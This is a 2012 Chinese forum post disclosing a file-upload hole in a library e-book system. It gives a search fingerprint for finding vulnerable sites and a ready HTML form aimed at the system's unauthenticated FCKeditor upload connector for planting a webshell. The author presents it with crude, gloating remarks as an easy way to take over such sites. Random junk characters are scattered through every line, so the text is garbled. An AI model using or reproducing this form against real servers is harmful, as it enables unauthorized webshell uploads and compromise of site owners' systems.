主题:图书馆系统任意文件上传漏洞
" E2 v6 b) z0 U8 w& z9 ~ 作者:冰锋刺客
6 ?) M8 X+ V/ ^, G3 z( U9 q 厂商:点击书(dianjishu.com)
. U+ J7 W, B7 s- h 日期:2012-6-21
/ s7 J/ ]: k+ R$ Y' n# `0 Z
* u4 I8 S9 g; w6 `7 hI 概述0 s3 f- B+ H: I
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell1 }3 L2 ?2 I* o+ J2 m' k
II 简介7 g# J5 G# v3 x" L
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"$ Y9 U0 @# ~9 E
补充一个漏洞% D0 V* v3 x0 B6 h7 g {0 t( I
<form id="frmUpload" enctype="multipart/form-data"
, r% A3 r8 Y( Z1 h8 B2 S# q3 o action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>3 c2 P% y+ Z3 ]
<input id="btnUpload" type="submit" value="操翻他">( k( l, ?8 {" Q
</form>: ?& Y0 S& @6 H7 ]
你们懂的6 {% Y0 R5 h( n! Y
那傻逼提供还需要改包.
- j# t: q4 W9 o0 s6 r# R2 q* D, W 自己看了下源代码发现fckeditor, A) E( i! c; d* L& W3 d
直接秒杀. O6 b h2 P- ?, p: r
|
发表于 2012-9-10 21:20:59
收藏
支持
反对